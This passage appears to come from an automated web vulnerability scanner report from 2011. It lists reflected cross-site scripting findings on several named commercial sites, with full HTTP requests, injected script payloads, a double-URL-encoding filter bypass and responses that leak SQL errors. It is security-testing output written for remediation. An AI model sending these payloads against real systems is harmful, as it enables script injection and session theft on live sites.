Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:12:40 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af8052e03e831e\"><script>alert(1)</script>4dbe77a7b98" target="_blank">
...[SNIP]...

5.54. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5c0"><script>alert(1)</script>476da428095 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c5c0\"><script>alert(1)</script>476da428095 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /order/checkout.php?CART_ID=28d9066c6ec8a32ef621f59af805/3c5c0"><script>alert(1)</script>476da4280952e03 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: https://secure.avangate.com/order/cart.php?PRODS=1523013&QTY=1
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=dteebjh09n3gl94ubf15q229d7jcnclm; GKD=%95%DB%CE%9F%A1%CF%AEt%9D%B9%8E%C9%B1%C2%9C%9A%91%AB%85q%A2%CB%B4%E4%A0%BC%91%AA%91%83%96%CE%B0%D5%B3%CF%90%88%9A%A9%96%B5%AC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sat, 26 Mar 2011 17:12:51 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 38011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--[if IE 9]>
<meta http-equiv="X-UA-Compatible
...[SNIP]...
<a href="/order/nojs.php?CART_ID=28d9066c6ec8a32ef621f59af805/3c5c0\"><script>alert(1)</script>476da4280952e03" target="_blank">
...[SNIP]...

5.55. https://secure.shareit.com/shareit/checkout.html [prno parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.shareit.com
Path:   /shareit/checkout.html

Issue detail

The value of the prno request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3d6b"style%3d"x%3aexpression(alert(1))"7e03f89d48f1f098f was submitted in the prno parameter. This input was echoed as e3d6b"style="x:expression(alert(1))"7e03f89d48f1f098f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /shareit/checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1e3d6b"style%3d"x%3aexpression(alert(1))"7e03f89d48f1f098f&DELIVERY%5B0%5D=EML&WPRODUCTS%5B0%5D=1&MPRODUCT_ID=&RE_USERNAME=&RE_PASSWORD=&REG_NAME_RADIO=NAME&COMPANY=&SALUTATION=&FIRSTNAME=&LASTNAME=&D_STREET1=&D_STREET2=&D_CITY=&D_STATE_ID=&D_POSTALCODE=&D_COUNTRY_ID=400&VATID=&PHONE=&FAX=&EMAIL=&EMAIL_CONFIRM=&PAYMENTTYPE_ID=&CURRENCY_ID=USD&BUTTON_NEXT.x=11&BUTTON_NEXT.y=5&BUTTON_NEXT=Next&progress=ADDITIONAL&FROM_PERSONAL=1 HTTP/1.1
Host: secure.shareit.com
Connection: keep-alive
Referer: https://secure.shareit.com/shareit/checkout.html?PRODUCT[300261966]=1&HADD[300261966][ADDITIONAL1]=BITRIX_SM.NzAwMjg4MC40NjE5NjY3Lk4wLi4uZW4%3D&hidecoupon=1
Cache-Control: max-age=0
Origin: https://secure.shareit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-dc5-e5-moonlight-sol-01=1023542538.20480.0000

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 17:14:50 GMT
Server: Apache
P3P: policyref="https://secure.element5.com/w3c/p3p.xml", CP="CAO DSP COR ADMo PSA CONo HIS OUR SAMo UNRo LEG UNI"
Keep-Alive: timeout=5, max=5000
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 70594

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Fast Reports Inc. - Buy</title>
<style type="text/css">
<!--
/*Hauptelemente*/
body
{
font-family :
...[SNIP]...
<form action="checkout.html?sessionid=1875107339&random=81d9c2f56ca1d5d469974f8d6edb7406&prno=1e3d6b"style="x:expression(alert(1))"7e03f89d48f1f098f" method="post" name="personal">
...[SNIP]...

5.56. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the adRotationId request parameter is copied into the HTML document as plain text between tags. The payload 15362<script>alert(1)</script>c2ae901adec was submitted in the adRotationId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=1512115362<script>alert(1)</script>c2ae901adec&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:35 GMT
Expires: Thu, 31 Mar 2011 00:53:36 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQQTCCABA=BJDABGFBNKIJMNOLMEEHBLEG; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 1512115362<script>alert(1)</script>c2ae901adec, @ipAddress = '173.193.214.243', @sessionId = '358722929', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'Default', @browserVersion = '0.0', @domain = 'undefined', @op
...[SNIP]...

5.57. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the bannerCreativeAdModuleId request parameter is copied into the HTML document as plain text between tags. The payload 11b9c<script>alert(1)</script>0fafab07e80 was submitted in the bannerCreativeAdModuleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=2115211b9c<script>alert(1)</script>0fafab07e80&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:46 GMT
Expires: Thu, 31 Mar 2011 00:53:47 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSSDAQTD=DMFLEBDBFICMGDJEEAPNGJDN; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 2115211b9c<script>alert(1)</script>0fafab07e80, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '320191441', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @bro
...[SNIP]...

5.58. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload 9ff62<script>alert(1)</script>a02173191c0 was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146&campaignId=63309ff62<script>alert(1)</script>a02173191c0&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:43 GMT
Expires: Thu, 31 Mar 2011 00:53:43 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSAQSSSA=ONHBGAMBKDGPKDOKOLCOCKME; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 63309ff62<script>alert(1)</script>a02173191c0, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '470174562', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'Default'
...[SNIP]...

5.59. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload 801ff<script>alert(1)</script>31ecc76c45b was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E801ff<script>alert(1)</script>31ecc76c45b&syndicationOutletId=47146&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:28 GMT
Expires: Thu, 31 Mar 2011 00:53:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCSCDADCC=GEJBKNEBJAEILNIPENOHAGGD; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>801ff<script>alert(1)</script>31ecc76c45b, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '349885665', @pixel = '0', @ipNumber = '291516
...[SNIP]...

5.60. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload 778a4<script>alert(1)</script>cb1fdeb4541 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000013)%3C/script%3E&syndicationOutletId=47146778a4<script>alert(1)</script>cb1fdeb4541&campaignId=6330&adRotationId=15121&bannerCreativeAdModuleId=21152&redirect=http://ar.voicefive.com/b/recruitBeacon.pli%3fpid%3dp84532700%26PRAd%3d47146%26AR_C%3d34917 HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; __qca=P0-856732706-1300545864725

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Thu, 31 Mar 2011 00:53:39 GMT
Expires: Thu, 31 Mar 2011 00:53:40 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCATAABCD=FNGFGBFBAEMHNKPEBBBEDMOA; path=/
X-Powered-By: ASP.NET
Content-Length: 779
Connection: keep-alive

<br>Error Description:Incorrect syntax near '173.193'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = '"--></style></script><script>alert(0x000013)</script>, @bannerCreativeAdModuleId = 21152, @campaignId = 6330, @syndicationOutletId = 47146778a4<script>alert(1)</script>cb1fdeb4541, @adrotationId = 15121, @ipAddress = '173.193.214.243', @sessionId = '353828072', @pixel = '0', @ipNumber = '2915161843', @referer = 'undefined', @browserName = 'Default', @browserVersion = '0.0', @do
...[SNIP]...

5.61. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f794%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2a4004720cf was submitted in the REST URL parameter 2. This input was echoed as 7f794</script><script>alert(1)</script>2a4004720cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/include7f794%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2a4004720cf/background.js?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17815
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
5.pfxID="acg";
s_265.pageName=s_265.pfxID+" : "+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "include7f794</script><script>alert(1)</script>2a4004720cf" : "national";

var isUrl2 = "background.js";
s_265.prop2= isUrl2 != ''? "background.js" :"main";

s_265.prop12=document.URL.split('?')[0];
s_265.events="";
s_265.products="";
//s_265.purchase
...[SNIP]...

5.62. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ab3c"><script>alert(1)</script>489e273b4e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include1ab3c"><script>alert(1)</script>489e273b4e5/background.js?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17459
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include1ab3c"><script>alert(1)</script>489e273b4e5/background.js?9"/>
...[SNIP]...

5.63. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f2a6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6285eeee8c was submitted in the REST URL parameter 3. This input was echoed as 3f2a6</script><script>alert(1)</script>c6285eeee8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/include/background.js3f2a6%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec6285eeee8c?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17390
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:45 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
"+pageName;
s_265.channel="us.citybest";
s_265.linkInternalFilters="javascript:,citysbest.com";

var isCity = "";
s_265.prop1= isCity !='' ? "include" : "national";

var isUrl2 = "background.js3f2a6</script><script>alert(1)</script>c6285eeee8c";
s_265.prop2= isUrl2 != ''? "background.js3f2a6</script>
...[SNIP]...

5.64. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/background.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 806f6"><script>alert(1)</script>d9a439bdd79 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /www.citysbest.com/include/background.js806f6"><script>alert(1)</script>d9a439bdd79?9 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache/2.2
Content-Length: 17175
Content-Type: text/html
Expires: Sat, 26 Mar 2011 20:36:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Mar 2011 20:36:43 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...
<meta property="og:url" content="http://www.citysbest.com/include/background.js806f6"><script>alert(1)</script>d9a439bdd79?9"/>
...[SNIP]...

5.65. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /www.citysbest.com/include/citysbest-min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8037%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e465808f0b34 was submitted in the REST URL parameter 2. This input was echoed as d8037</script><script>alert(1)</script>465808f0b34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /www.citysbest.com/included8037%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e465808f0b34/citysbest-min.js?29 HTTP/1.1
Host: www.blogsmithmedia.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
